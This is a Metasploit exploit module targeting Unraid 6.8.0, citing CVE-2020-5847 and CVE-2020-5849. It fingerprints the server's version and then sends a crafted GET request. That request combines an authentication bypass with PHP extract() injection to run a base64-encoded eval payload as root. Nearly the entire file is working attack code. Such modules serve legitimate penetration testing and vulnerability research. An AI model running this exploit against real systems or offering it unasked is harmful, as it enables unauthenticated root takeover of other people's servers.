# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::PhpEXE
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Unraid 6.8.0 Auth Bypass PHP Code Execution',
'Description' => %q{
This module exploits two vulnerabilities affecting Unraid
6.8.0.
An authentication bypass is used to gain access to the
administrative
interface, and an insecure use of the extract PHP function can be
abused
for arbitrary code execution as root.
},
'Author' =>
[
'Nicolas CHATELAIN <
],
'References' =>
[
[ 'CVE', '2020-5847' ],
[ 'CVE', '2020-5849' ],
[ 'URL',
'https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/'
],
[ 'URL',
'https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/'
]
],
'License' => MSF_LICENSE,
'Platform' => ['php'],
'Privileged' => true,
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 10 2020'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The URI of the Unraid
application', '/'])
]
)
end
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path,
'webGui/images/green-on.png/'),
'method' => 'GET'
)
unless res
return CheckCode::Unknown('Connection failed')
end
unless res.code == 200
return CheckCode::Safe('Unexpected reply')
end
/\sVersion:\s(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2}) / =~ res.body
if version && Gem::Version.new(version) ==
Gem::Version.new('6.8.0')
return CheckCode::Appears("Unraid version #{version} appears to be
vulnerable")
end
CheckCode::Safe
end
def exploit
begin
vprint_status('Sending exploit code')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path,
'webGui/images/green-on.png/'),
'method' => 'GET',
'encode_params' => false,
'vars_get' =>
{
'path' => 'x',
'site[x][text]' => Rex::Text.uri_encode("<?php
eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));
?>", 'hex-normal')
}
)
if res.nil?
print_good('Request timed out, OK if running a non-forking/blocking
payload...')
elsif res.code == 302
fail_with(Failure::NotVulnerable, 'Redirected, target is not
vulnerable.')
else
print_warning("Unexpected response code #{res.code}, please check
your payload.")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the
web service")
end
end
end